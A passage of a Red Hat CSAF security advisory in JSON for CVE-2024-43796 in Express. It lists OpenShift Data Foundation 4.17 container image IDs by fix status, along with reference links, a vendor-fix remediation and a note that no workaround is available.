"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:22b568f083c7563ffbb8d23807837a0f78cedeb156cffe9110906f3b6e0c70fb_arm64",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:50f66564131a5b2b695582956c80515d7eea64d1c009479665937c97a76e2348_ppc64le",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:a27c28ecf714cc248323a35eb58daec2aa611a318f0e61eb0defe0eaa80eb2f4_amd64",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:bee14d945af0620ad1666e67be750324a1814cbf573256c1c88521e18f9877f7_s390x"
],
"known_not_affected": [
"9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:2b9e511b21d4fefe8450f014962f2450db3e64af07f5e6e4bbfdaafafdfdc1f4_ppc64le",
"9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:9a822fddffde8f67711c5025a89e003341011e0b8145cfd5b840849cabbe68a0_amd64",
"9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:e35426de9ea6419f4981d8c6861867fc3eadcde4e41757b9a8f1ed4f2fa00dc9_s390x",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:78656a47235af49c9a7bc75d9729987edf39a77077a3f478f5b46658df18878a_amd64",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:92544e943e160d8fce1a9710a9d67ca4ccb795ff846edf7717d1e52835899202_ppc64le",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:9615793800efca765c5ae588e0547e4e18bdfe264c8a92303fbbc39276c74580_s390x",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:d6e30344ec1d541b6791b0e58cb48f4f3f492069ff8392005e8d1f16350c80e2_arm64",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:7bc24afafec3a0896c887d7eeeca47eb6f0cb12e35c62aa212ce55210cb1512d_amd64",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:93b238c24a3623bd635e162caa9a30ad7158db25eb83b545e9b365db0f769161_ppc64le",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:fb6507b95b53b19d90b82c3ac2a3b0264ebbdb9d4a8ceff3006e8a446a1cef49_s390x",
"9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:71b79ea2f0356740a0e53e89a0422f8da608dd43337dd07dfcbadc9f9d8a8884_amd64",
"9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:729fdaad48dfca53af4b3bf9bbf3cbf9dd25d5c50ddcbac03d0e8738aeb997cc_s390x",
"9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:ed0d44fd0215cd299b4929617fa1f05ea31c6ee3cc078fbf6cc884e02a59beee_ppc64le",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:1d189e8c4dfcc998d5887e1c5f06e874fa0beed29bc8f87f279299d58124a505_arm64",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:5f92812a17a6637280387a3033865d8bd13ee8d6506f8e17489cefb79c53f58e_amd64",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:7eba9da5ba5071b411bc99d33eee04e3f4530516ad984524920de542629e9b55_ppc64le",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:f8c6007e32c54ffe0597952ae6eb1d38435188d605f3995ec785dff43da4257d_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:824823d527bdbbdd2abb773e054c12b41243e15467ada76689af4fdd6fae894a_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:9521eae22f7669dea4b31841d7cfe11e5d92155b11785afb2977cea9c5d917dc_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:a94961fd2c5aea06922c9c365c3a6296abf073e09a520f190a45f687cabc7b1d_amd64",
"9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:26503c487a93ad520e1953ccad9200be808bc93648db90eaba3a73a340483541_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:78f3e869e50bd0e69d8e6efc6e6de357aadcc06ac3659d6ec7a053cda11be88b_amd64",
"9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:fb473ae152002d124ff662e94ca9bf68f8f6a4c61c40d4f2929a55ef1c25cd20_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:0bb022ca33965fb0f9de7df36f15377a33c90d873050dcbd763370ac1f06295a_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:1070f8191e3ead7781876ed4d84ac5c5eeb54a1fa4d2c40701ebf393d345111c_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:8dbdc5fb2b8d4551e5896f65654b3dae8a5164c12b1e1ec6d7fdda348a7b8c7d_arm64",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:e7afe93fc1d88c385edc3d8ab3173e7bfb4a4f890d371836d5d2f72a2eb4abb5_amd64",
"9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:147c2497071460ba266fc5ef0768d82edb6be9d7ffaa0c514e49308cf8017e7a_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:28fd2ef06dbf379ad4204877a3492933a731f2bc1d6dd7fc1600f52a3dc3ca47_amd64",
"9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:6616912ec376e6993346b38bf637eb47d7a00aa9f58120899470c8353be02a0e_s390x",
"9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:60f6533b7262bbfad59c5e14dff71878d3ea501c3b46194155ce53bc43a119e4_amd64",
"9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:664c467321c9a5c3fec9d4fd85e16ab50677684b480cd1f346638f794ee7357c_s390x",
"9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:b14752e1e9e6b004429f3c36dbaf4ec4d36d22ab9ac84c2d5158e8fbdfb214dd_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:3472c7c043b318c2569e8a900527b13d052f1860082dba13723514795cedeec0_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54828ef99fc8d8fa3801c2ea0338a56f382018e4ae1a800dcd328fe43f7149be_arm64",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54a164ce15d25597fa3939709acbe467f728ce4f4165771a685fc507edfb92a3_s390x",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:cfa36a55dc542e3e1332a55a59588a753f80e32d905847e51efdd1478fd58f0b_amd64",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:0e2a71ed4eaa44f786428e18e01d90d3b0384169c78c5654e2ebbaac3a5ee2a4_ppc64le",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:8046b84915034f60a5e5e349b001f04b713b3aa71ced136390c5086e0c351dd4_amd64",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:9cbf21dad9ed5738ae1feb112707af3e74e02784795addf07ee4228bbd22e932_s390x",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:a42d48b82e34f1f7cb731c3bdd25e81dc5ff3a61a3ca0b8b5eecefb5e2218be0_arm64",
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:89cc7f0d6adb957e0f3adbdb2c023d4a6dda89e388a94d0b4015e0853971075e_ppc64le",
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:917e625bfea670e543f857cf7cea31380b76ceac862bee61cc490cebabd23081_amd64",
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:b1ba270980579090845909bb4f1e8a7b98ce8816c7c5ea60903432d138d29310_s390x",
"9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:2be1d5ad630b9e91f30e0c82cfee52231d095cee87908949170e40a39f4ed814_ppc64le",
"9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:37ec39720b1ce9701630635f158ad20414b1cda335b15b11526a7838ed189a54_s390x",
"9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:7c59771279f5227246a941925160ca2f9fc169bd13972ab68a476e62308707e1_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:328ddae72c795012c7671c214d9a84d539264f8fe855d1a9e2dbb74590e72076_s390x",
"9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:99d8b3aedcc57f57716bba144b991f7f223cdcc47ec37903c85aa20df295b3d4_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:f3f28074884a29b5d28f4535af6489f1ca8326dd60689c4bc8c862277dcb6e22_ppc64le",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:12e2b71cea2c63fb14363334287f5affa4ff3dc84f24dd51b5f57ba6a751c2da_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:7fa969e6714e0c3851f30999df5c823cd5738f28e1b2f6c06d940541c6edad4e_s390x",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:a0ac08a8a3ee9155338182d47bf55595a78aec3811c70f3fedb2ed461aad3319_arm64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:b96b09407708601d04abb6a90d16f6f1260839534d64238b6aa4c7a5f458a6a4_ppc64le",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:02e65965166ec9794f11b663de59671f159f8b2fef4d56ee5589b26bef342168_s390x",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:322bae96941ede565a681ad98fc287f442f36888e0ed2b5ec4b309c702c7488b_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:6e44cf5a814ceb7fea6ef925f6381a279837ebe2baf2980f4937e0c752afa5e2_arm64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:7a206b9fe0e540674fc9ec97b338607e61b8bfd3bfe30855835d0a940ca9304c_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:25052271f038b691ef973ac5a9fc02eee015a0427e087a5a390f1e31f7823d79_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:3342a17a1afca419dbfbff815261e91cdf8dcf0eecaf5a25a1713a39f3f95bf4_amd64",
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:df597ffd1b0d14d394e39b1d92fc90797bea5386a390450193d99f7db5bc377c_s390x",
"9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:883ba750931a93d30ff1dd3ed78592940a0079640da3d79400261f43fbecb69f_s390x",
"9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:baf554d45b1fb4b38b264145809c10c7733120104bc4d8bd9e1ecb0c428db382_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:c05b5597918214f845c7243b7407b6cc3c88f644eec504585bd411727376b898_amd64",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:0810e85e929ad83a8593eab74a312b9c49ec94ea9833a37b7f06bca87ca9647b_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:54cec6c71192cc9cb6c2bbcd812a5dcccd4905d5d7e822b4012622bb235fe75c_arm64",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:66de77eb933a0fb4e0d98d2c1326212d494f6c3aa2e235f27f2a641fb31ff4af_s390x",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:941371cee3ee7dd127d5663b7e1bcb39c6565031c11fb508f07c40f37aaee4d1_amd64",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:6978d438b80f8fd7572c792155c2f86cc6fa55ff0b8cb1d45bbe04e42d185fe3_ppc64le",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:7c09fb5c685be2a3029d02a35417e681f3b034269d1ac3014c1c5cdd2e035e61_s390x",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:8ccd7099f174842dab551c27a55d822cfb12d8ba26c3528f605697cbfbbf8e70_amd64",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:d0a1a2f77001e06cdb650b857433d6eebeb53eb5337354c8a042003db80387db_arm64",
"9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:01d80d9fc9cbc3f3fecab4716bde805ad97b1fbcd4942ecbb07eab9fb4714012_s390x",
"9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:6e3b814a41abf41ec9cdb5d71aafc79a086fc37f2986a3fd74f75341a4af91a2_amd64",
"9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:f8e5b7818849a95ca57347496baa35507ce634c645643303205309f55572db7d_ppc64le",
"9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:0d5aa39387a341a497a0cbc8d18c0e1e050e118b08243f5d8395ffe7394cc5f1_amd64",
"9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:26541764bf0b79a4cc87600d1a1981a247d7678f9a8c37af62e80f22213159a7_s390x",
"9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:75a85b98bcfa527709b8b1f16694a8bf68d5ea84a66b73baf5fea927df6e2904_ppc64le",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:37af72217b81a8a7b0d968ec09a396f1840155f2a472eaa68927281f080d137f_amd64",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:70ff7d9b8f6fb97fbe72768ed97519cd9e2b60dedbe1133d17fd0e317079ab3f_ppc64le",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:9d7f8b892351de60609c30d187c5547ba4bec3be2dadd0e6d8ded2c4f3c1e79e_s390x",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:f94cd1be8e371e8c85062be3e4475157cb628d339c1716bf96167e02703edf97_arm64",
"9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1b641a6aa2c4b1bc79ab0188c56f533fd89459be71b2b34f794faebaa66fd1f5_s390x",
"9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1e2ebbe9f71a03bfc6a0bd90f786293d9eec473ba2d570c8662a7f8d03dcc1b4_ppc64le",
"9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:40d75cfa1eb657512dc4da888a5bb793a3ef3d6726665bc9ad7009cdd4166a1f_amd64",
"9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:22c88c1f6be208bc0a5f0053f99ea728b9e457e150b4236a04304810270f1f80_ppc64le",
"9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:50d04e71ae52f1a246d1509c5f2abbcb2f2bb2209090526b3357b8012b4b67d5_s390x",
"9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:d7e8549c1a5cabd7324c589eadf9ccebccc1abbfb69d47826baaeaebc283c6a3_amd64",
"9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:0223d74679590c8a5fbd34f3d793c05ec671ecb406b2055166bd54f09f75bbda_amd64",
"9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:137a8a07adae2c0bb5fd1ac2a5823ffd85abe1035512a04e112e55b0aa3dc163_ppc64le",
"9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:987ed8aa1347a831f61a4d65011f5bd00a700c65f6e7fa669ff3f38131425705_s390x",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:2f414dc954bca2cd17f0bbabea11a8f18437eb417c6266d8c4750ba96957fc87_amd64",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:bf140f64657478a7f94bacd6784f7b7727d5df9ae8eb4c526f86d5533bff06ae_arm64",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:d9c38fe43617f214fea848ef7124d77f30358e2049390fc3bd3526986ff9ebbb_s390x",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:fc251ea3c441bd0d3e358969fb6730bb9e53e340da9eff8bb6a173a37116c943_ppc64le",
"9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:1055afb10a6ce469d2c77337878f510b29375a830f14505042da8a6d6081c438_amd64",
"9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:5df96c3b3dc8cdad2c8b42fd9378dc55779cdb11f64eea5fa653101505d4d497_s390x",
"9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:7cb791603d9d7c8c1c8e5200f96401ad0fadc5db14ad698e7a9519d046d0fdd0_ppc64le",
"9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:7488149277a76efe188086d283fa2acf732a4eca8bdeaa4de8744204876a77a2_amd64",
"9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:b89943771e55457bd3765efd5f3e6e6697953ee9e5c7bd123921a274b79536d3_ppc64le",
"9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:cf89aaa1ad0614707748c0ab0b26ee40855053b0f4932cd5edaa8ccf8b1470e7_s390x"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2024-43796"
},
{
"category": "external",
"summary": "RHBZ#2311152",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2311152"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2024-43796",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-43796"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2024-43796",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-43796"
},
{
"category": "external",
"summary": "https://github.com/expressjs/express/commit/54271f69b511fea198471e6ff3400ab805d6b553",
"url": "https://github.com/expressjs/express/commit/54271f69b511fea198471e6ff3400ab805d6b553"
},
{
"category": "external",
"summary": "https://github.com/expressjs/express/security/advisories/GHSA-qw6h-vgh9-j6wx",
"url": "https://github.com/expressjs/express/security/advisories/GHSA-qw6h-vgh9-j6wx"
}
],
"release_date": "2024-09-10T15:15:17.510000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2024-10-30T14:25:22+00:00",
"details": "Before applying this update, make sure all previously released errata relevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:22b568f083c7563ffbb8d23807837a0f78cedeb156cffe9110906f3b6e0c70fb_arm64",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:50f66564131a5b2b695582956c80515d7eea64d1c009479665937c97a76e2348_ppc64le",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:a27c28ecf714cc248323a35eb58daec2aa611a318f0e61eb0defe0eaa80eb2f4_amd64",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:bee14d945af0620ad1666e67be750324a1814cbf573256c1c88521e18f9877f7_s390x"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2024:8676"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:2b9e511b21d4fefe8450f014962f2450db3e64af07f5e6e4bbfdaafafdfdc1f4_ppc64le",
"9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:9a822fddffde8f67711c5025a89e003341011e0b8145cfd5b840849cabbe68a0_amd64",
"9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:e35426de9ea6419f4981d8c6861867fc3eadcde4e41757b9a8f1ed4f2fa00dc9_s390x",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:78656a47235af49c9a7bc75d9729987edf39a77077a3f478f5b46658df18878a_amd64",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:92544e943e160d8fce1a9710a9d67ca4ccb795ff846edf7717d1e52835899202_ppc64le",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:9615793800efca765c5ae588e0547e4e18bdfe264c8a92303fbbc39276c74580_s390x",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:d6e30344ec1d541b6791b0e58cb48f4f3f492069ff8392005e8d1f16350c80e2_arm64",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:7bc24afafec3a0896c887d7eeeca47eb6f0cb12e35c62aa212ce55210cb1512d_amd64",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:93b238c24a3623bd635e162caa9a30ad7158db25eb83b545e9b365db0f769161_ppc64le",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:fb6507b95b53b19d90b82c3ac2a3b0264ebbdb9d4a8ceff3006e8a446a1cef49_s390x",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:22b568f083c7563ffbb8d23807837a0f78cedeb156cffe9110906f3b6e0c70fb_arm64",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:50f66564131a5b2b695582956c80515d7eea64d1c009479665937c97a76e2348_ppc64le",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:a27c28ecf714cc248323a35eb58daec2aa611a318f0e61eb0defe0eaa80eb2f4_amd64",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:bee14d945af0620ad1666e67be750324a1814cbf573256c1c88521e18f9877f7_s390x",
"9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:71b79ea2f0356740a0e53e89a0422f8da608dd43337dd07dfcbadc9f9d8a8884_amd64",
"9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:729fdaad48dfca53af4b3bf9bbf3cbf9dd25d5c50ddcbac03d0e8738aeb997cc_s390x",
"9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:ed0d44fd0215cd299b4929617fa1f05ea31c6ee3cc078fbf6cc884e02a59beee_ppc64le",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:1d189e8c4dfcc998d5887e1c5f06e874fa0beed29bc8f87f279299d58124a505_arm64",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:5f92812a17a6637280387a3033865d8bd13ee8d6506f8e17489cefb79c53f58e_amd64",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:7eba9da5ba5071b411bc99d33eee04e3f4530516ad984524920de542629e9b55_ppc64le",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:f8c6007e32c54ffe0597952ae6eb1d38435188d605f3995ec785dff43da4257d_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:824823d527bdbbdd2abb773e054c12b41243e15467ada76689af4fdd6fae894a_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:9521eae22f7669dea4b31841d7cfe11e5d92155b11785afb2977cea9c5d917dc_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:a94961fd2c5aea06922c9c365c3a6296abf073e09a520f190a45f687cabc7b1d_amd64",
"9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:26503c487a93ad520e1953ccad9200be808bc93648db90eaba3a73a340483541_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:78f3e869e50bd0e69d8e6efc6e6de357aadcc06ac3659d6ec7a053cda11be88b_amd64",
"9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:fb473ae152002d124ff662e94ca9bf68f8f6a4c61c40d4f2929a55ef1c25cd20_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:0bb022ca33965fb0f9de7df36f15377a33c90d873050dcbd763370ac1f06295a_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:1070f8191e3ead7781876ed4d84ac5c5eeb54a1fa4d2c40701ebf393d345111c_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:8dbdc5fb2b8d4551e5896f65654b3dae8a5164c12b1e1ec6d7fdda348a7b8c7d_arm64",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:e7afe93fc1d88c385edc3d8ab3173e7bfb4a4f890d371836d5d2f72a2eb4abb5_amd64",
"9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:147c2497071460ba266fc5ef0768d82edb6be9d7ffaa0c514e49308cf8017e7a_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:28fd2ef06dbf379ad4204877a3492933a731f2bc1d6dd7fc1600f52a3dc3ca47_amd64",
"9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:6616912ec376e6993346b38bf637eb47d7a00aa9f58120899470c8353be02a0e_s390x",
"9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:60f6533b7262bbfad59c5e14dff71878d3ea501c3b46194155ce53bc43a119e4_amd64",
"9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:664c467321c9a5c3fec9d4fd85e16ab50677684b480cd1f346638f794ee7357c_s390x",
"9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:b14752e1e9e6b004429f3c36dbaf4ec4d36d22ab9ac84c2d5158e8fbdfb214dd_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:3472c7c043b318c2569e8a900527b13d052f1860082dba13723514795cedeec0_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54828ef99fc8d8fa3801c2ea0338a56f382018e4ae1a800dcd328fe43f7149be_arm64",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54a164ce15d25597fa3939709acbe467f728ce4f4165771a685fc507edfb92a3_s390x",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:cfa36a55dc542e3e1332a55a59588a753f80e32d905847e51efdd1478fd58f0b_amd64",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:0e2a71ed4eaa44f786428e18e01d90d3b0384169c78c5654e2ebbaac3a5ee2a4_ppc64le",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:8046b84915034f60a5e5e349b001f04b713b3aa71ced136390c5086e0c351dd4_amd64",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:9cbf21dad9ed5738ae1feb112707af3e74e02784795addf07ee4228bbd22e932_s390x",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:a42d48b82e34f1f7cb731c3bdd25e81dc5ff3a61a3ca0b8b5eecefb5e2218be0_arm64",
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:89cc7f0d6adb957e0f3adbdb2c023d4a6dda89e388a94d0b4015e0853971075e_ppc64le",
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:917e625bfea670e543f857cf7cea31380b76ceac862bee61cc490cebabd23081_amd64",
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:b1ba270980579090845909bb4f1e8a7b98ce8816c7c5ea60903432d138d29310_s390x",
"9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:2be1d5ad630b9e91f30e0c82cfee52231d095cee87908949170e40a39f4ed814_ppc64le",
"9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:37ec39720b1ce9701630635f158ad20414b1cda335b15b11526a7838ed189a54_s390x",
"9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:7c59771279f5227246a941925160ca2f9fc169bd13972ab68a476e62308707e1_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:328ddae72c795012c7671c214d9a84d539264f8fe855d1a9e2dbb74590e72076_s390x",
"9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:99d8b3aedcc57f57716bba144b991f7f223cdcc47ec37903c85aa20df295b3d4_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:f3f28074884a29b5d28f4535af6489f1ca8326dd60689c4bc8c862277dcb6e22_ppc64le",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:12e2b71cea2c63fb14363334287f5affa4ff3dc84f24dd51b5f57ba6a751c2da_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:7fa969e6714e0c3851f30999df5c823cd5738f28e1b2f6c06d940541c6edad4e_s390x",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:a0ac08a8a3ee9155338182d47bf55595a78aec3811c70f3fedb2ed461aad3319_arm64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:b96b09407708601d04abb6a90d16f6f1260839534d64238b6aa4c7a5f458a6a4_ppc64le",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:02e65965166ec9794f11b663de59671f159f8b2fef4d56ee5589b26bef342168_s390x",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:322bae96941ede565a681ad98fc287f442f36888e0ed2b5ec4b309c702c7488b_amd64",
